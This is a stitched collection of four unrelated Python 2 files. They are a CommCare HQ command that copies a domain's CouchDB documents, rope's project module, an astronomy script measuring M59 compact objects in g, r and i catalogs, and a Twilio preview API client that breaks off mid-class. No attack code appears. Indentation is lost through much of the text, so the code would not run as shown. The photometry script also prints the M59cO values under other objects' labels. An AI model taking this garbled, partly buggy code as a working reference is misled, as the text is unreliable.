from multiprocessing import Process, Queue
import sys
import os
from couchdbkit import ResourceNotFound, ResourceConflict
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from http_parser.http import ParserError
from restkit import RequestError
from corehq.apps.domain.models import Domain
from corehq.apps.domainsync.management.commands.copy_utils import copy_postgres_data_for_docs
from corehq.util.couchdb_management import CouchConfig
from corehq.util.dates import iso_string_to_date
from dimagi.utils.couch.database import iter_docs
from corehq.apps.domainsync.config import DocumentTransform, save
from optparse import make_option
from dimagi.utils.parsing import json_format_date

# doc types we want to be careful not to copy, which must be explicitly
# specified with --include
DEFAULT_EXCLUDE_TYPES = [
'ReportNotification',
'WeeklyNotification',
'DailyNotification'
]
NUM_PROCESSES = 8
class Command(BaseCommand):
help = "Copies the contents of a domain to another database. " \
"If targetdb is not specified, the target is the database " \
"specified by COUCH_DATABASE in your settings."
args = '<sourcedb> <domain> [<targetdb>]'
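    # A hypothetical invocation (URL, domain name and doc types are illustrative):
    #
    #   ./manage.py copy_domain https://user:pass@source.example.com:5984 my-domain \
    #       --include=DocTypeA,DocTypeB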
option_list = BaseCommand.option_list + (
make_option('--include',
action='store',
dest='doc_types',
default='',
help='Comma-separated list of Document Types to copy'),
make_option('--exclude',
action='store',
dest='doc_types_exclude',
default='',
help='Comma-separated list of Document Types to NOT copy.'),
make_option('--exclude-attachments',
action='store_true',
dest='exclude_attachments',
default=False,
help="Don't copy document attachments, just the docs themselves."),
make_option('--since',
action='store',
dest='since',
default='',
                    help='Only copy documents newer than this date. Format: yyyy-MM-dd.'),
make_option('--list-types',
action='store_true',
dest='list_types',
default=False,
help='Don\'t copy anything, just list all the available document types.'),
make_option('--simulate',
action='store_true',
dest='simulate',
default=False,
help='Don\'t copy anything, print what would be copied.'),
make_option('--id-file',
action='store',
dest='id_file',
default='',
help="File containing one document ID per line. Only docs with these ID's will be copied"),
make_option('--postgres-db',
action='store',
dest='postgres_db',
default='',
help="Name of postgres database to pull additional data from. This should map to a "
"key in settings.DATABASES. If not specified no additional postgres data will be "
"copied. This is currently used to pull CommCare Supply models."),
make_option('--postgres-password',
action='store',
dest='postgres_password',
default='',
help="Password for postgres database to pull additional data from. If not specified will "
"default to the value in settings.DATABASES"),
make_option('--dont-run-multi-process',
action='store_false',
dest='run_multi_process',
default=True,
help="If set to true this spawn multiple processes which should speed up the time taken to "
"copy. This must be false if running in a supervised process")
)
def iter_source_dbs(self):
for sourcedb_name, sourcedb in self.source_couch.all_dbs_by_slug.items():
if sourcedb_name not in self.exclude_dbs:
print "In {} db".format(sourcedb_name or "the main")
yield sourcedb_name, sourcedb
def handle(self, *args, **options):
if len(args) not in [2, 3]:
raise CommandError('Usage is copy_domain %s' % self.args)
self.exclude_dbs = (
# these have data we don't want to copy
'receiverwrapper', 'auditcare', 'fluff-bihar', 'fluff-opm',
'fluff-mc', 'fluff-cvsu', 'mvp-indicators', 'm4change',
# todo: missing domain/docs, but probably want to add back
'meta',
)
self.source_couch = source_couch = CouchConfig(args[0])
domain = args[1].strip()
simulate = options['simulate']
exclude_attachments = options['exclude_attachments']
self.run_multi_process = options['run_multi_process']
since = json_format_date(iso_string_to_date(options['since'])) if options['since'] else None
if options['list_types']:
for sourcedb_name, sourcedb in self.iter_source_dbs():
self.list_types(sourcedb, domain, since)
sys.exit(0)
if simulate:
print "\nSimulated run, no data will be copied.\n"
if options['postgres_db'] and options['postgres_password']:
settings.DATABASES[options['postgres_db']]['PASSWORD'] = options['postgres_password']
self.targetdb = CouchConfig(args[2]) if len(args) == 3 else CouchConfig()
try:
domain_doc = Domain.get_by_name(domain)
except ResourceNotFound:
domain_doc = None
if domain_doc is None:
self.copy_domain(source_couch, domain)
if options['doc_types']:
doc_types = options['doc_types'].split(',')
for doc_type in doc_types:
sourcedb = source_couch.get_db_for_doc_type(doc_type)
startkey = [x for x in [domain, doc_type, since] if x is not None]
endkey = [x for x in [domain, doc_type, {}] if x is not None]
self.copy_docs(sourcedb, domain, simulate, startkey, endkey, doc_type=doc_type, since=since,
postgres_db=options['postgres_db'], exclude_attachments=exclude_attachments)
elif options['id_file']:
path = options['id_file']
if not os.path.isfile(path):
print "Path '%s' does not exist or is not a file" % path
sys.exit(1)
            with open(path) as f:
                doc_ids = [line.rstrip('\n') for line in f]
            if not doc_ids:
                print "Path '%s' does not contain any document IDs" % path
                sys.exit(1)
for sourcedb_name, sourcedb in self.iter_source_dbs():
self.copy_docs(sourcedb, domain, simulate, doc_ids=doc_ids, postgres_db=options['postgres_db'],
exclude_attachments=exclude_attachments)
else:
startkey = [domain]
endkey = [domain, {}]
exclude_types = DEFAULT_EXCLUDE_TYPES + options['doc_types_exclude'].split(',')
for sourcedb_name, sourcedb in self.iter_source_dbs():
self.copy_docs(sourcedb, domain, simulate, startkey, endkey, exclude_types=exclude_types,
postgres_db=options['postgres_db'], exclude_attachments=exclude_attachments)
def list_types(self, sourcedb, domain, since):
doc_types = sourcedb.view("by_domain_doc_type_date/view", startkey=[domain],
endkey=[domain, {}], reduce=True, group=True, group_level=2)
doc_count = dict([(row['key'][1], row['value']) for row in doc_types])
if since:
for doc_type in sorted(doc_count.iterkeys()):
num_since = sourcedb.view("by_domain_doc_type_date/view", startkey=[domain, doc_type, since],
endkey=[domain, doc_type, {}], reduce=True).all()
num = num_since[0]['value'] if num_since else 0
print "{0:<30}- {1:<6} total {2}".format(doc_type, num, doc_count[doc_type])
else:
for doc_type in sorted(doc_count.iterkeys()):
print "{0:<30}- {1}".format(doc_type, doc_count[doc_type])
def copy_docs(self, sourcedb, domain, simulate, startkey=None, endkey=None, doc_ids=None,
doc_type=None, since=None, exclude_types=None, postgres_db=None, exclude_attachments=False):
if not doc_ids:
doc_ids = [result["id"] for result in sourcedb.view("by_domain_doc_type_date/view", startkey=startkey,
endkey=endkey, reduce=False)]
total = len(doc_ids)
count = 0
msg = "Found %s matching documents in domain: %s" % (total, domain)
msg += " of type: %s" % (doc_type) if doc_type else ""
msg += " since: %s" % (since) if since else ""
print msg
err_log = self._get_err_log()
if self.run_multi_process:
queue = Queue(150)
for i in range(NUM_PROCESSES):
Worker(queue, sourcedb, self.targetdb, exclude_types, total, simulate, err_log, exclude_attachments).start()
for doc in iter_docs(sourcedb, doc_ids, chunksize=100):
count += 1
queue.put((doc, count))
# shutdown workers
for i in range(NUM_PROCESSES):
queue.put(None)
else:
for doc in iter_docs(sourcedb, doc_ids, chunksize=100):
target = self.targetdb.get_db_for_doc_type(doc['doc_type'])
count += 1
copy_doc(doc, count, sourcedb, target, exclude_types, total, simulate, exclude_attachments)
err_log.close()
        if os.stat(err_log.name).st_size == 0:
os.remove(err_log.name)
else:
print 'Failed document IDs written to %s' % err_log.name
if postgres_db:
copy_postgres_data_for_docs(postgres_db, doc_ids=doc_ids, simulate=simulate)
def copy_domain(self, source_couch, domain):
print "Copying domain doc"
sourcedb = source_couch.get_db_for_class(Domain)
result = sourcedb.view(
"domain/domains",
key=domain,
reduce=False,
include_docs=True
).first()
if result and 'doc' in result:
domain_doc = Domain.wrap(result['doc'])
dt = DocumentTransform(domain_doc._obj, sourcedb)
save(dt, self.targetdb.get_db_for_doc_type(domain_doc['doc_type']))
else:
print "Domain doc not found for domain %s." % domain
def _get_err_log(self):
name = 'copy_domain.err.%s'
for i in range(1000): # arbitrarily large number
candidate = name % i
if not os.path.isfile(candidate):
return open(candidate, 'a', buffering=1)
class Worker(Process):
def __init__(self, queue, sourcedb, targetdb, exclude_types, total, simulate, err_log, exclude_attachments):
super(Worker, self).__init__()
self.queue = queue
self.sourcedb = sourcedb
self.targetdb = targetdb
self.exclude_types = exclude_types
self.exclude_attachments = exclude_attachments
self.total = total
self.simulate = simulate
self.err_log = err_log
def run(self):
for doc, count in iter(self.queue.get, None):
try:
target = self.targetdb.get_db_for_doc_type(doc['doc_type'])
copy_doc(doc, count, self.sourcedb, target, self.exclude_types, self.total, self.simulate,
self.exclude_attachments)
except Exception, e:
self.err_log.write('%s\n' % doc["_id"])
print " Document %s failed! Error is: %s %s" % (doc["_id"], e.__class__.__name__, e)
def copy_doc(doc, count, sourcedb, targetdb, exclude_types, total, simulate, exclude_attachments):
if exclude_types and doc["doc_type"] in exclude_types:
print " SKIPPED (excluded type: %s). Synced %s/%s docs (%s: %s)" % \
(doc["doc_type"], count, total, doc["doc_type"], doc["_id"])
else:
if not simulate:
            # retry the fetch up to 5 times; a RequestError may be transient
            for i in reversed(range(5)):
try:
dt = DocumentTransform(doc, sourcedb, exclude_attachments)
break
except RequestError:
if i == 0:
raise
            # likewise, retry the save up to 5 times before giving up
            for i in reversed(range(5)):
try:
save(dt, targetdb)
break
except (ResourceConflict, ParserError, TypeError):
if i == 0:
raise
print " Synced %s/%s docs (%s: %s)" % (count, total, doc["doc_type"], doc["_id"])
# ---------------------------------------------------------------------------
import cPickle as pickle
import os
import shutil
import sys
import warnings
import rope.base.fscommands
from rope.base import exceptions, taskhandle, prefs, history, pycore, utils
from rope.base.resourceobserver import *
from rope.base.resources import File, Folder, _ResourceMatcher
class _Project(object):
def __init__(self, fscommands):
self.observers = []
self.fscommands = fscommands
self.prefs = prefs.Prefs()
self.data_files = _DataFiles(self)
def get_resource(self, resource_name):
"""Get a resource in a project.
`resource_name` is the path of a resource in a project. It is
the path of a resource relative to project root. Project root
        folder address is an empty string. If the resource does not
        exist, an `exceptions.ResourceNotFoundError` exception is
        raised. Use `get_file()` and `get_folder()` when you need to
get nonexistent `Resource`\s.
"""
path = self._get_resource_path(resource_name)
if not os.path.exists(path):
raise exceptions.ResourceNotFoundError(
'Resource <%s> does not exist' % resource_name)
elif os.path.isfile(path):
return File(self, resource_name)
elif os.path.isdir(path):
return Folder(self, resource_name)
else:
raise exceptions.ResourceNotFoundError('Unknown resource '
+ resource_name)
def validate(self, folder):
"""Validate files and folders contained in this folder
It validates all of the files and folders contained in this
folder if some observers are interested in them.
"""
for observer in list(self.observers):
observer.validate(folder)
def add_observer(self, observer):
"""Register a `ResourceObserver`
See `FilteredResourceObserver`.
"""
self.observers.append(observer)
def remove_observer(self, observer):
"""Remove a registered `ResourceObserver`"""
if observer in self.observers:
self.observers.remove(observer)
def do(self, changes, task_handle=taskhandle.NullTaskHandle()):
"""Apply the changes in a `ChangeSet`
Most of the time you call this function for committing the
changes for a refactoring.
"""
self.history.do(changes, task_handle=task_handle)
def get_pycore(self):
return self.pycore
def get_file(self, path):
"""Get the file with `path` (it may not exist)"""
return File(self, path)
def get_folder(self, path):
"""Get the folder with `path` (it may not exist)"""
return Folder(self, path)
def is_ignored(self, resource):
return False
def get_prefs(self):
return self.prefs
def _get_resource_path(self, name):
pass
@property
@utils.saveit
def history(self):
return history.History(self)
@property
@utils.saveit
def pycore(self):
return pycore.PyCore(self)
def close(self):
warnings.warn('Cannot close a NoProject',
DeprecationWarning, stacklevel=2)
ropefolder = None
class Project(_Project):
"""A Project containing files and folders"""
def __init__(self, projectroot, fscommands=None,
ropefolder='.ropeproject', **prefs):
"""A rope project
:parameters:
- `projectroot`: The address of the root folder of the project
- `fscommands`: Implements the file system operations used
by rope; have a look at `rope.base.fscommands`
- `ropefolder`: The name of the folder in which rope stores
project configurations and data. Pass `None` for not using
such a folder at all.
- `prefs`: Specify project preferences. These values
overwrite config file preferences.
"""
if projectroot != '/':
projectroot = _realpath(projectroot).rstrip('/\\')
self._address = projectroot
self._ropefolder_name = ropefolder
if not os.path.exists(self._address):
os.mkdir(self._address)
elif not os.path.isdir(self._address):
raise exceptions.RopeError('Project root exists and'
' is not a directory')
if fscommands is None:
fscommands = rope.base.fscommands.create_fscommands(self._address)
super(Project, self).__init__(fscommands)
self.ignored = _ResourceMatcher()
self.file_list = _FileListCacher(self)
self.prefs.add_callback('ignored_resources', self.ignored.set_patterns)
if ropefolder is not None:
self.prefs['ignored_resources'] = [ropefolder]
self._init_prefs(prefs)
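    # A construction sketch (path and file name are illustrative):
    #
    #     project = Project('/path/to/projectroot', ropefolder='.ropeproject')
    #     resource = project.get_resource('module.py')
    #     project.close()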
def get_files(self):
return self.file_list.get_files()
def _get_resource_path(self, name):
return os.path.join(self._address, *name.split('/'))
def _init_ropefolder(self):
if self.ropefolder is not None:
if not self.ropefolder.exists():
self._create_recursively(self.ropefolder)
if not self.ropefolder.has_child('config.py'):
config = self.ropefolder.create_file('config.py')
config.write(self._default_config())
def _create_recursively(self, folder):
if folder.parent != self.root and not folder.parent.exists():
self._create_recursively(folder.parent)
folder.create()
def _init_prefs(self, prefs):
run_globals = {}
if self.ropefolder is not None:
config = self.get_file(self.ropefolder.path + '/config.py')
run_globals.update({'__name__': '__main__',
'__builtins__': __builtins__,
'__file__': config.real_path})
if config.exists():
config = self.ropefolder.get_child('config.py')
execfile(config.real_path, run_globals)
else:
exec(self._default_config(), run_globals)
if 'set_prefs' in run_globals:
run_globals['set_prefs'](self.prefs)
for key, value in prefs.items():
self.prefs[key] = value
self._init_other_parts()
self._init_ropefolder()
if 'project_opened' in run_globals:
run_globals['project_opened'](self)
def _default_config(self):
import rope.base.default_config
import inspect
return inspect.getsource(rope.base.default_config)
def _init_other_parts(self):
# Forcing the creation of `self.pycore` to register observers
self.pycore
def is_ignored(self, resource):
return self.ignored.does_match(resource)
def sync(self):
"""Closes project open resources"""
self.close()
def close(self):
"""Closes project open resources"""
self.data_files.write()
def set(self, key, value):
"""Set the `key` preference to `value`"""
self.prefs.set(key, value)
@property
def ropefolder(self):
if self._ropefolder_name is not None:
return self.get_folder(self._ropefolder_name)
def validate(self, folder=None):
if folder is None:
folder = self.root
super(Project, self).validate(folder)
root = property(lambda self: self.get_resource(''))
address = property(lambda self: self._address)
class NoProject(_Project):
"""A null object for holding out of project files.
    This class is a singleton; use the `get_no_project` global function.
"""
def __init__(self):
fscommands = rope.base.fscommands.FileSystemCommands()
super(NoProject, self).__init__(fscommands)
def _get_resource_path(self, name):
real_name = name.replace('/', os.path.sep)
return _realpath(real_name)
def get_resource(self, name):
universal_name = _realpath(name).replace(os.path.sep, '/')
return super(NoProject, self).get_resource(universal_name)
def get_files(self):
return []
_no_project = None
def get_no_project():
if NoProject._no_project is None:
NoProject._no_project = NoProject()
return NoProject._no_project
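# A minimal sketch of the singleton accessor above (path is illustrative):
#
#     prj = get_no_project()
#     f = prj.get_file('/tmp/example.py')  # wrap a file outside any project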
class _FileListCacher(object):
def __init__(self, project):
self.project = project
self.files = None
rawobserver = ResourceObserver(
self._changed, self._invalid, self._invalid,
self._invalid, self._invalid)
self.project.add_observer(rawobserver)
def get_files(self):
if self.files is None:
self.files = set()
self._add_files(self.project.root)
return self.files
def _add_files(self, folder):
for child in folder.get_children():
if child.is_folder():
self._add_files(child)
elif not self.project.is_ignored(child):
self.files.add(child)
def _changed(self, resource):
if resource.is_folder():
self.files = None
def _invalid(self, resource, new_resource=None):
self.files = None
class _DataFiles(object):
def __init__(self, project):
self.project = project
self.hooks = []
def read_data(self, name, compress=False, import_=False):
if self.project.ropefolder is None:
return None
compress = compress and self._can_compress()
opener = self._get_opener(compress)
file = self._get_file(name, compress)
if not compress and import_:
self._import_old_files(name)
if file.exists():
input = opener(file.real_path, 'rb')
try:
result = []
try:
while True:
result.append(pickle.load(input))
except EOFError:
pass
if len(result) == 1:
return result[0]
if len(result) > 1:
return result
finally:
input.close()
def write_data(self, name, data, compress=False):
if self.project.ropefolder is not None:
compress = compress and self._can_compress()
file = self._get_file(name, compress)
opener = self._get_opener(compress)
output = opener(file.real_path, 'wb')
try:
pickle.dump(data, output, 2)
finally:
output.close()
def add_write_hook(self, hook):
self.hooks.append(hook)
def write(self):
for hook in self.hooks:
hook()
def _can_compress(self):
try:
import gzip
return True
except ImportError:
return False
def _import_old_files(self, name):
old = self._get_file(name + '.pickle', False)
new = self._get_file(name, False)
if old.exists() and not new.exists():
shutil.move(old.real_path, new.real_path)
def _get_opener(self, compress):
if compress:
try:
import gzip
return gzip.open
except ImportError:
pass
return open
def _get_file(self, name, compress):
path = self.project.ropefolder.path + '/' + name
if compress:
path += '.gz'
return self.project.get_file(path)
def _realpath(path):
"""Return the real path of `path`
Is equivalent to ``realpath(abspath(expanduser(path)))``.
"""
path = path or ''
# there is a bug in cygwin for os.path.abspath() for abs paths
if sys.platform == 'cygwin':
if path[1:3] == ':\\':
return path
return os.path.abspath(os.path.expanduser(path))
return os.path.realpath(os.path.abspath(os.path.expanduser(path)))
# ---------------------------------------------------------------------------
'''
Determine optimum aperture and use Source Extractor to get photometry
'''
import sys
import os
from subprocess import call, Popen, PIPE
import glob
import math
import numpy as np
import Sources
import Quadtree
import createSexConfig
import createSexParam
import findBestAperture
import calcZeropoint
import makeRegionFile
import phot_utils
import geom_utils
verbose = True
def associate(list1, tree2, tree3):
dist = 0.001
matches = []
for entry in list1:
        match2 = tree2.match(entry.ra, entry.dec)
        if match2 is not None and geom_utils.equnorm(entry.ra, entry.dec, match2.ra, match2.dec) <= dist:
            match3 = tree3.match(entry.ra, entry.dec)
            if match3 is not None and geom_utils.equnorm(entry.ra, entry.dec, match3.ra, match3.dec) <= dist:
# Match2 is r-magnitudes
entry.match2 = match2.mag_aper
# Match3 is i-magnitudes
entry.match3 = match3.mag_aper
matches.append(entry)
return matches
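# A usage sketch for associate(), mirroring the commented-out block at the
# bottom of main() (catalog names are illustrative):
#
#     with open('NGC4621_g.cat') as f:
#         g_sources = [Sources.SCAMSource(l) for l in f if phot_utils.no_head(l)]
#     matches = associate(g_sources, make_trees('NGC4621_r.cat'),
#                         make_trees('NGC4621_i.cat'))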
def get_photometry(system, in_images):
    subs = []
    imgs = []
    with open(in_images, "r") as f:
for line in f:
cols = line.split()
subs.append(cols[0])
imgs.append(cols[1])
filter_file = "default.conv"
param_file = createSexParam.createSexParam(system, False)
for galsub, img in zip(subs, imgs):
image = phot_utils.load_fits(img, verbose=False)
path = os.getcwd()
fname = system + '_' + img[-6]
seeing = [1, 1]
satur = image[0].header['SATURATE']
#ap = findBestAperture.findBestAperture(path, img, satur, seeing[0])
ap = 5
# Extract sources with initial rough estimate of seeing
config = createSexConfig.createSexConfig(fname, filter_file,
param_file, satur, seeing[0], "nill", ap, False)
call(['sex', '-c', config, galsub, img])
seeing = phot_utils.calc_seeing(fname + '.cat', verbose=verbose)
"If the aperture is less than the seeing round it up to next interger"
if ap < seeing[1]:
ap = math.ceil(seeing[1])
# Re-extract with refined seeing
config = createSexConfig.createSexConfig(fname, filter_file,
param_file, satur, seeing[0], "nill", ap, False)
call(['sex', '-c', config, galsub, img])
# Re-name the check images created
checks = (glob.glob('*.fits'))
if not os.path.isdir('CheckImages'):
os.mkdir('CheckImages')
for check in checks:
os.rename(check, fname + '_' + check)
call(['mv', fname + '_' + check, 'CheckImages'])
def correct_mags(galaxy, catalog, band):
print "band: ", band
zp = calcZeropoint.calcZP(galaxy, catalog, band)
if verbose:
print "Zeropoint for " + band + "-band", zp
with open(catalog, 'r') as f:
tmp = filter(lambda line: phot_utils.no_head(line), f)
sources = map(lambda line: Sources.SCAMSource(line), tmp)
for source in sources:
source.mag_aper = round(source.mag_aper + zp, 3)
source.mag_auto = round(source.mag_auto + zp, 3)
source.mag_best = round(source.mag_best + zp, 3)
new_catalog = 'zpcorrected_' + catalog
with open(new_catalog, 'w') as output:
output.write(''.join(map(lambda source: '%5s' % source.name + '%15s' % source.flux_iso +
'%15s' % source.fluxerr_iso + '%15s' % source.flux_aper +
'%15s' % source.fluxerr_aper + '%15s' % source.ximg + '%15s' % source.yimg +
'%15s' % source.ra + '%15s' % source.dec + '%15s' % source.mag_auto +
'%15s' % source.mag_auto_err + '%15s' % source.mag_best +
'%15s' % source.mag_best_err + '%15s' % source.mag_aper +
'%15s' % source.mag_aper_err + '%15s' % source.a_world +
'%15s' % source.a_world_err + '%15s' % source.b_world +
'%15s' % source.b_world_err + '%15s' % source.theta_err +
'%15s' % source.theta + '%15s' % source.isoarea + '%15s' % source.mu +
'%15s' % source.flux_radius + '%15s' % source.flags + '%15s' % source.fwhm +
'%15s' % source.elogation + '%15s' % source.vignet + '\n', sources)))
return new_catalog
def make_trees(catalog):
with open(catalog, 'r') as f:
tmp = filter(lambda line: phot_utils.no_head(line), f)
tmp2 = map(lambda line: Sources.SCAMSource(line), tmp)
ra = map(lambda line: line.ra, tmp2)
dec = map(lambda line: line.dec, tmp2)
sources = Quadtree.ScamEquatorialQuadtree(min(ra), min(dec),
max(ra), max(dec))
map(lambda line: sources.insert(line), tmp2)
#if verbose:
# makeRegionFile.makeRegionFile('NGC4621_i.cat', 'NGC4621_i.reg', 10, 'blue')
return sources
def main():
# get_photometry(sys.argv[1], sys.argv[2])
# catalogs = (glob.glob('NGC4621*.cat'))
# for catalog in catalogs:
# if verbose:
# print "Working on catalog: ", catalog
# corrected_catalog = correct_mags(sys.argv[1], catalog, catalog[-5])
catalogs = (glob.glob('zpcorrected*.cat'))
trees = {}
for catalog in catalogs:
trees[catalog[-5]] = make_trees(catalog)
m59_ucd3_i = trees['i'].match(190.54601, 11.64478)
m59_ucd3_g = trees['g'].match(190.54601, 11.64478)
m59_ucd3_r = trees['r'].match(190.54601, 11.64478)
print '\n'
print "M59-UCD3's Location in catalog: ", m59_ucd3_i.name
print 'MAG_AUTO: '
print "I Mag and G Mag: ", m59_ucd3_i.mag_auto, m59_ucd3_g.mag_auto
print 'M59-UCD3 g-i: ', m59_ucd3_g.mag_auto - m59_ucd3_i.mag_auto
print 'MAG_APER: '
print "I Mag and G Mag: ", m59_ucd3_i.mag_aper, m59_ucd3_g.mag_aper
print 'M59-UCD3 g-i: ', m59_ucd3_g.mag_aper - m59_ucd3_i.mag_aper
print 'M59-UCD3 FWHM: ', m59_ucd3_g.fwhm*0.2
print 'M59_UCD3 Half-Light Radius: ', m59_ucd3_g.flux_radius
print "Coordinates from i-band catalog - "
print phot_utils.convertRA(m59_ucd3_i.ra), phot_utils.convertDEC(m59_ucd3_i.dec)
print "Coordinates from g-band catalog - "
print phot_utils.convertRA(m59_ucd3_g.ra), phot_utils.convertDEC(m59_ucd3_g.dec)
print '\n'
print '\n'
m59cO_i = trees['i'].match(190.48056, 11.66771)
m59cO_g = trees['g'].match(190.48056, 11.66771)
m59cO_r = trees['r'].match(190.48056, 11.66771)
print "M59cO's Location in catalog: ", m59cO_i.name
print "MAG_AUTO: "
print "I Mag and G Mag: ", m59cO_i.mag_auto, m59cO_g.mag_auto
print 'M59cO g-i: ', m59cO_g.mag_auto - m59cO_i.mag_auto
print "MAG_APER: "
print "I Mag and G Mag: ", m59cO_i.mag_aper, m59cO_g.mag_aper
print 'M59cO g-i: ', m59cO_g.mag_aper - m59cO_i.mag_aper
print 'M59cO Half-Light Radius: ', m59cO_g.flux_radius
print "Coordinates from i-band catalog - "
print phot_utils.convertRA(m59cO_i.ra), phot_utils.convertDEC(m59cO_i.dec)
print "Coordinates from g-band catalog - "
print phot_utils.convertRA(m59cO_g.ra), phot_utils.convertDEC(m59cO_g.dec)
print '\n'
print '\n'
m59_gcx_i = trees['i'].match(190.50245, 11.65993)
m59_gcx_g = trees['g'].match(190.50245, 11.65993)
m59_gcx_r = trees['r'].match(190.50245, 11.65993)
print "M59_gcx's Location in catalog: ", m59cO_i.name
print "MAG_AUTO: "
print "I Mag and G Mag: ", m59cO_i.mag_auto, m59cO_g.mag_auto
print 'M59_gcx g-i: ', m59cO_g.mag_auto - m59cO_i.mag_auto
print "MAG_APER: "
print "I Mag and G Mag: ", m59cO_i.mag_aper, m59cO_g.mag_aper
print 'M59_gcx g-i: ', m59cO_g.mag_aper - m59cO_i.mag_aper
print 'M59_gcx Half-Light Radius: ', m59cO_g.flux_radius
print "Coordinates from i-band catalog - "
print phot_utils.convertRA(m59cO_i.ra), phot_utils.convertDEC(m59cO_i.dec)
print "Coordinates from g-band catalog - "
print phot_utils.convertRA(m59cO_g.ra), phot_utils.convertDEC(m59cO_g.dec)
print '\n'
print '\n'
m59_gcy_i = trees['i'].match(190.51231, 11.63986)
m59_gcy_g = trees['g'].match(190.51231, 11.63986)
m59_gcy_r = trees['r'].match(190.51231, 11.63986)
print "M59_gcy's Location in catalog: ", m59cO_i.name
print "MAG_AUTO: "
print "I Mag and G Mag: ", m59cO_i.mag_auto, m59cO_g.mag_auto
print 'M59_gcy g-i: ', m59cO_g.mag_auto - m59cO_i.mag_auto
print "MAG_APER: "
print "I Mag and G Mag: ", m59cO_i.mag_aper, m59cO_g.mag_aper
print 'M59_gcy g-i: ', m59cO_g.mag_aper - m59cO_i.mag_aper
print 'M59_gcy Half-Light Radius: ', m59cO_g.flux_radius
print "Coordinates from i-band catalog - "
print phot_utils.convertRA(m59cO_i.ra), phot_utils.convertDEC(m59cO_i.dec)
print "Coordinates from g-band catalog - "
print phot_utils.convertRA(m59cO_g.ra), phot_utils.convertDEC(m59cO_g.dec)
print '\n'
print '\n'
ngc_4621_aimss1_i = trees['i'].match(190.47050, 11.63001)
ngc_4621_aimss1_g = trees['g'].match(190.47050, 11.63001)
ngc_4621_aimss1_r = trees['r'].match(190.47050, 11.63001)
print "ngc_4621_aimss's Location in catalog: ", m59cO_i.name
print "MAG_AUTO: "
print "I Mag and G Mag: ", m59cO_i.mag_auto, m59cO_g.mag_auto
print 'ngc_4621_aimss g-i: ', m59cO_g.mag_auto - m59cO_i.mag_auto
print "MAG_APER: "
print "I Mag and G Mag: ", m59cO_i.mag_aper, m59cO_g.mag_aper
print 'ngc_4621_aimss g-i: ', m59cO_g.mag_aper - m59cO_i.mag_aper
print 'ngc_4621_aimss Half-Light Radius: ', m59cO_g.flux_radius
print "Coordinates from i-band catalog - "
print phot_utils.convertRA(m59cO_i.ra), phot_utils.convertDEC(m59cO_i.dec)
print "Coordinates from g-band catalog - "
print phot_utils.convertRA(m59cO_g.ra), phot_utils.convertDEC(m59cO_g.dec)
print '\n'
print '\n'
# with open('NGC4621_g.cat', 'r') as catalog:
# tmp = filter(lambda line: phot_utils.no_head(line), catalog)
# g_sources = map(lambda source: Sources.SCAMSource(source), tmp)
#
# r_sources = make_trees('NGC4621_r.cat')
# i_sources = make_trees('NGC4621_i.cat')
#
# matches = associate(g_sources, r_sources, i_sources)
#
# with open('matched_gri.cat', 'w') as out:
# out.write()
if __name__ == '__main__':
sys.exit(main())
# ---------------------------------------------------------------------------
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import values
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class CpsList(ListResource):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version):
"""
Initialize the CpsList
:param Version version: Version that contains the resource
:returns: twilio.rest.preview.trusted_comms.cps.CpsList
:rtype: twilio.rest.preview.trusted_comms.cps.CpsList
"""
super(CpsList, self).__init__(version)
# Path Solution
self._solution = {}
def get(self):
"""
Constructs a CpsContext
:returns: twilio.rest.preview.trusted_comms.cps.CpsContext
:rtype: twilio.rest.preview.trusted_comms.cps.CpsContext
"""
return CpsContext(self._version, )
def __call__(self):
"""
Constructs a CpsContext
:returns: twilio.rest.preview.trusted_comms.cps.CpsContext
:rtype: twilio.rest.preview.trusted_comms.cps.CpsContext
"""
return CpsContext(self._version, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Preview.TrustedComms.CpsList>'
class CpsPage(Page):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version, response, solution):
"""
Initialize the CpsPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:returns: twilio.rest.preview.trusted_comms.cps.CpsPage
:rtype: twilio.rest.preview.trusted_comms.cps.CpsPage
"""
super(CpsPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of CpsInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.preview.trusted_comms.cps.CpsInstance
:rtype: twilio.rest.preview.trusted_comms.cps.CpsInstance
"""
return CpsInstance(self._version, payload, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Preview.TrustedComms.CpsPage>'
class CpsContext(InstanceContext):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version):
"""
Initialize the CpsContext
:param Version version: Version that contains the resource
:returns: twilio.rest.preview.trusted_comms.cps.CpsContext
:rtype: twilio.rest.preview.trusted_comms.cps.CpsContext
"""
super(CpsContext, self).__init__(version)
# Path Solution
self._solution = {}
self._uri = '/CPS'.format(**self._solution)
def fetch(self, x_xcnam_sensitive_phone_number=values.unset):
"""
Fetch the CpsInstance
:param unicode x_xcnam_sensitive_phone_number: Phone number to retrieve CPS.
:returns: The fetched CpsInstance
:rtype: twilio.rest.preview.trusted_comms.cps.CpsInstance
"""
headers = values.of({'X-Xcnam-Sensitive-Phone-Number': x_xcnam_sensitive_phone_number, })
payload = self._version.fetch(method='GET', uri=self._uri, headers=headers, )
return CpsInstance(self._version, payload, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Preview.TrustedComms.CpsContext {}>'.format(context)
class CpsInstance(InstanceResource):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version, payload):
"""
Initialize the CpsInstance
:returns: twilio.rest.preview.trusted_comms.cps.CpsInstance
:rtype: twilio.rest.preview.trusted_comms.cps.CpsInstance
"""
